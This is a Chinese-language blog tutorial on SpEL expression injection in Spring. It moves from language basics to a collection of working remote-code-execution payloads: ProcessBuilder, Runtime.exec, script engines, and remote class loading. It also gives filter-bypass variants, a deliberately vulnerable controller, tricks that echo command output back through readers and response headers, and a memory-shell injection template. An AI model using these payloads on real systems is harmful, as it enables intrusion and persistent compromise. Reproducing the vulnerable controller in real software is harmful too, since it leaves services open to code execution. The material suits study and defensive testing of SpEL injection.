SPEL表达式注入分析

环境依赖

1. <dependencies>
2.     <dependency>
3.         <groupId>org.springframework</groupId>
4.         <artifactId>spring-expression</artifactId>
5.         <version>5.1.9.RELEASE</version>
6.     </dependency>
7. </dependencies>

复制代码

SPEL表达式底子

SPEL简介

在Spring 3中引入了Spring表达式语言（Spring Expression Language，简称SpEL），这是一种功能强大的表达式语言，支持在运行时查询和操作对象图，可以与基于XML和基于注解的Spring配置还有bean界说一起使用。
在Spring系列产品中，SpEL是表达式盘算的底子，实现了与Spring生态系统全部产品无缝对接。Spring框架的核心功能之一就是通过依赖注入的方式来管理Bean之间的依赖关系，而SpEL可以方便快捷的对ApplicationContext中的Bean进行属性的装配和提取。由于它能够在运行时动态分配值，因此可以为我们节流大量Java代码。
SpEL有许多特性：

• 使用Bean的ID来引用Bean
  
• 可调用方法和访问对象的属性
  
• 可对值进行算数、关系和逻辑运算
  
• 可使用正则表达式进行匹配
  
• 可进行集合操作
  

定界符${}与#{}

这两个作用不太一样，${}是一个占位符，可以进行一些注入，但中间的内容不会被剖析，#{}是SPEL特有的定界符，中间的内容会被剖析
范例表达式T()

举个例子

1. package org.example;
3. import org.springframework.expression.Expression;
4. import org.springframework.expression.ExpressionParser;
5. import org.springframework.expression.spel.standard.SpelExpressionParser;
7. public class Main {
8.     public static void main(String[] args) {
9.         String cmdstr = "T(java.lang.String)";
10.         ExpressionParser parser = new SpelExpressionParser();
11.         Expression exp = parser.parseExpression(cmdstr);
12.         System.out.println(exp.getValue());
13.     }
14. }
16. // 输出
17. class java.lang.String

复制代码

T中的内容会被剖析成类，如上所示，这样我们也能剖析java.lang.Runtime
SPEL常见的表达式

一些比较常见的表达式
运算符范例运算符算数运算+, -, *, /, %, ^关系运算, ==, =, lt, gt, eq, le, ge逻辑运算and, or, not, !条件运算?ternary), ?Elvis)正则表达式matches运算符符号文本范例等于==eq小于</tdtdlt/td/trtrtd小于等于/tdtd=/tdtdle/td/trtrtd大于/tdtd/tdtdgt/td/trtrtd大于等于/tdtd>=ge变量界说和引用

在SPEL表达式中，变量界说通过EvaluationContext类的setVariable(variableName, value)函数来实现；在表达式中使用#variableName来引用；除了引用自界说变量，SPEL还允许引用根对象及当前上下文对象：

• this：使用当前正在盘算的上下文；
  
• root：引用容器的root对象；
  
• @something：引用Bean
  

RCE直接使用

常见有三种办法
ProcessBuilder

1. package org.example;
3. import org.springframework.expression.Expression;
4. import org.springframework.expression.ExpressionParser;
5. import org.springframework.expression.spel.standard.SpelExpressionParser;
7. public class Main {
8.     public static void main(String[] args) {
9.         String cmdstr = "new java.lang.ProcessBuilder(new String[]{'calc'}).start()";
10.         ExpressionParser parser = new SpelExpressionParser();
11.         Expression exp = parser.parseExpression(cmdstr);
12.         System.out.println(exp.getValue());
13.     }
14. }

复制代码

Runtime

1. package org.example;
3. import org.springframework.expression.Expression;
4. import org.springframework.expression.ExpressionParser;
5. import org.springframework.expression.spel.standard.SpelExpressionParser;
7. public class Main {
8.     public static void main(String[] args) {
9.         String cmdstr = "T(java.lang.Runtime).getRuntime().exec('calc')";
10.         ExpressionParser parser = new SpelExpressionParser();
11.         Expression exp = parser.parseExpression(cmdstr);
12.         System.out.println(exp.getValue());
13.     }
14. }

复制代码

ScriptEngine

1. package org.example;
3. import org.springframework.expression.Expression;
4. import org.springframework.expression.ExpressionParser;
5. import org.springframework.expression.spel.standard.SpelExpressionParser;
7. public class Main {
8.     public static void main(String[] args) {
9.         String cmdstr = "new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("s=[1];s[0]='calc';java.lang.Runtime.getRuntime().exec(s);")";
10.         // 或者
11.         String cmdstr = "new javax.script.ScriptEngineManager().getEngineByName("javascript").eval("s=[1];s[0]='calc';java.lang.Runtime.getRuntime().exec(s);")";
12.         ExpressionParser parser = new SpelExpressionParser();
13.         Expression exp = parser.parseExpression(cmdstr);
14.         System.out.println(exp.getValue());
15.     }
16. }

复制代码

留意这里调用的js的引擎，支持js语法，所以使用方式非常的机动，绕过黑名单啥的也是一把好手
类加载RCE

URLClassLoader

1. package org.example;
3. import org.springframework.expression.Expression;
4. import org.springframework.expression.ExpressionParser;
5. import org.springframework.expression.spel.standard.SpelExpressionParser;
7. public class Main {
8.     public static void main(String[] args) {
9.         String cmdstr = "new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL('http://127.0.0.1:8888/')}).loadClass("evilref").getConstructors()[0].newInstance()";
10.         String cmdstr = "new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL('http://127.0.0.1:8888/')}).loadClass("evilref").newInstance()";
11.         ExpressionParser parser = new SpelExpressionParser();
12.         Expression exp = parser.parseExpression(cmdstr);
13.         System.out.println(exp.getValue());
14.     }
15. }

复制代码

恶意类evilref用来弹盘算器，本身写一个就行
AppClassLoader

1. package org.example;
3. import org.springframework.expression.Expression;
4. import org.springframework.expression.ExpressionParser;
5. import org.springframework.expression.spel.standard.SpelExpressionParser;
7. public class Main {
8.     public static void main(String[] args) {
9.         String cmdstr = "T(java.lang.ClassLoader).getSystemClassLoader().loadClass('java.lang.Runtime').getRuntime().exec('calc')";
10.         ExpressionParser parser = new SpelExpressionParser();
11.         Expression exp = parser.parseExpression(cmdstr);
12.         System.out.println(exp.getValue());
13.     }
14. }

复制代码

绕过

假如ban掉了一些关键字，我们该怎样获取classloader

1. T(org.springframework.expression.Expression).getClass().getClassLoader()
3. #thymeleaf 情况下
4. T(org.thymeleaf.context.AbstractEngineContext).getClass().getClassLoader()
6. #web服务下通过内置对象
7. {request.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec("touch/tmp/foobar")}
9. username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf
11. #BCEL
12. T(com.sun.org.apache.bcel.internal.util.JavaWrapper)._main({"BCEL"})

复制代码

回显问题

先搭建一个spring服务，写个controller

1. package com.example.demo.controller;
3. import org.springframework.expression.Expression;
4. import org.springframework.expression.ExpressionParser;
5. import org.springframework.expression.spel.standard.SpelExpressionParser;
6. import org.springframework.stereotype.Controller;
7. import org.springframework.web.bind.annotation.RequestBody;
8. import org.springframework.web.bind.annotation.RequestMapping;
9. import org.springframework.web.bind.annotation.ResponseBody;
11. @Controller
12. public class spelcontroller {
13.     @RequestMapping("/spel")
14.     @ResponseBody
15.     public String spelvul(String payload){
16.         ExpressionParser parser = new SpelExpressionParser();
17.         Expression exp = parser.parseExpression(payload);
18.         return (String) exp.getValue();
19.     }
21. }

复制代码

nmmd，我为什么回显不了，sb springboot，直接给payload吧
BufferedReader

new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder("cmd", "/c", "whoami").start().getInputStream(), "gbk")).readLine()
Scanner

new java.util.Scanner(new java.lang.ProcessBuilder("cmd", "/c", "dir", ".\\").start().getInputStream(), "GBK").useDelimiter("asdasdasdasd").next()
这里的Delimiter是分隔符的意思，我们执行了dir指令，假如想让回显全部表如今一行。那么我们给一点乱七八糟的东西即可
ResponseHeader

由于springboot没有response，所以本身注册一个

1. package com.example.demo.controller;
3. import jakarta.servlet.http.HttpServletRequest;
4. import jakarta.servlet.http.HttpServletResponse;
5. import org.springframework.expression.Expression;
6. import org.springframework.expression.ExpressionParser;
7. import org.springframework.expression.spel.SpelParserConfiguration;
8. import org.springframework.expression.spel.standard.SpelExpressionParser;
9. import org.springframework.expression.spel.support.StandardEvaluationContext;
10. import org.springframework.stereotype.Controller;
11. import org.springframework.web.bind.annotation.RequestMapping;
12. import org.springframework.web.bind.annotation.ResponseBody;
14. @Controller
15. public class spelcontroller {
16.     @RequestMapping("/spel")
17.     @ResponseBody
18.     public String spelvul(String payload, HttpServletResponse response){
19.         StandardEvaluationContext context=new StandardEvaluationContext();
20.         context.setVariable("response",response);
21.         ExpressionParser parser = new SpelExpressionParser(new SpelParserConfiguration());
22.         Expression exp = parser.parseExpression(payload);
23.         return (String) exp.getValue();
24.     }
25. }

复制代码

#response.addHeader('x-cmd',new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder("cmd", "/c", "whoami").start().getInputStream(), "gbk")).readLine())
然后就会返回一个x-cmd请求头带着我们的命令回显
注入内存马

不需要response，直接注内存马来搞回显
T(org.springframework.cglib.core.ReflectUtils).defineClass('InceptorMemShell',T(org.springframework.util.Base64Utils).decodeFromString('????????'),T(java.lang.Thread).currentThread().getContextClassLoader()).newInstance()

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。